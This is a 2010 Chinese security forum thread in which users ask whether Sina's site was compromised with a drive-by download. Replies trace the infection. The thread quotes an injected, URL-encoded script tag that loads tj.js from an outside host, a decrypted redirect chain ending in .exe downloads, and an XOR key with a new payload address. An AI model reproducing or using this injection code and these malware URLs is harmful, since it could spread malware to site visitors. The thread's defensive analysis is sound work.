1   1  /  1  页   跳转

[讨论] 新浪是不是被挂马了

收藏
jhnicjhnet
头像
拙长孩提狮
  • 帖子:101
  • 注册: 2006-06-21
  • 来自:
发表于: 2010-11-17 20:45 | 只看楼主 短消息 资料
字号: 1楼

新浪是不是被挂马了

刚才访问新浪,总是出现cca.25u.com的入侵提示,还在一个页面上看到<script language=JavaScript src=http://a%6Aq.%4Bw%69k.%54o/tj.js></script>的异常代码

用户系统信息:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
最后编辑networkedition 最后编辑于 2010-11-19 16:13:08
分享到:
gototop
 
哥们郁闷啊
头像
强壮不惑狮
  • 帖子:1102
  • 注册: 2010-04-13
  • 来自:
发表于: 2010-11-17 20:48 | 短消息 资料
字号: 2楼

回复:新浪是不是被挂马了

我很关注!
gototop
 
networkedition
头像
社区嘉宾
  • 帖子:36698
  • 注册: 2008-02-28
  • 来自:
论坛8周年活动礼物09欢乐圣诞10温馨圣诞
发表于: 2010-11-18 09:26 | 短消息 资料
字号: 3楼

回复 1F jhnicjhnet 的帖子

关于:hxxp://ajq.kwik.to/tj.js解密的日志(全体输出 -  17):

Level  0>http://ajq.kwik.to/tj.js
Level  1>http://ccd.25u.com/88/1211fe.htm
Level  2>http://js.tongji.linezing.com/2030508/tongji.js
Level  2>http://ccd.25u.com/88/2.js
Level  3>http://ccd.25u.com/88/safe/360safe.html
Level  4>http://ccd.25u.com/88/second1209.css
Level  2>http://ccd.25u.com/88/av.htm
Level  3>http://ccd.25u.com/88/7.htm
Level  4>http://ccd.25u.com/88/ieee.jpg
Level  4>http://ccd.25u.com/88/iee.jpg
Level  5>http://ccd.25u.com/l/ao.exe
Level  4>http://ccd.25u.com/88/ie.jpg
Level  3>http://ccd.25u.com/88/6.htm
Level  4>http://ccd.25u.com/88/iee.jpg
Level  5>http://ccd.25u.com/l/ao.exe
Level  4>http://ccd.25u.com/88/ie.jpg
Level  2>http://ccd.25u.com/88/jc_list

日志由 Redoce2.1第19次修正版于 2010-11-18 9:27:59 生成。
gototop
 
StreetMilk
头像
飘泊而立狮
  • 帖子:710
  • 注册: 2008-03-23
  • 来自:
发表于: 2010-11-18 14:20 | 短消息 资料
字号: 4楼

回复:新浪是不是被挂马了

到Level  4>http://ccd.25u.com/88/iee.jpg这一步,解不出下面这一步,杯具:
Level  5>http://ccd.25u.com/l/ao.exe
gototop
 
networkedition
头像
社区嘉宾
  • 帖子:36698
  • 注册: 2008-02-28
  • 来自:
论坛8周年活动礼物09欢乐圣诞10温馨圣诞
发表于: 2010-11-18 15:33 | 短消息 资料
字号: 5楼

回复 4F StreetMilk 的帖子

XOR:BD,地址已经变了:hxxp://ccj.25u.com/l/ap.exe
gototop
 
jhnicjhnet
头像
拙长孩提狮
  • 帖子:101
  • 注册: 2006-06-21
  • 来自:
发表于: 2010-11-18 20:48 | 只看楼主 短消息 资料
字号: 6楼

回复: 新浪是不是被挂马了

什么意思?你们是把那个js下载后解开了?后来访问的很多网站都带了这个js,我怀疑在内存里,重启机器后正常了。硬盘上也找不到异常程序。
gototop
 
是昔流芳
头像
卡卡反病毒小组
  • 帖子:646
  • 注册: 2009-05-10
  • 来自:青鸾峰
发表于: 2010-11-18 22:24 | 短消息 资料
字号: 7楼

回复 6F jhnicjhnet 的帖子

访问新浪的哪个页面,留下URL了吗?
My Blog
gototop
 
<<上一主题|下一主题>>
1   1  /  1  页   跳转
页面顶部
Powered by Discuz!NT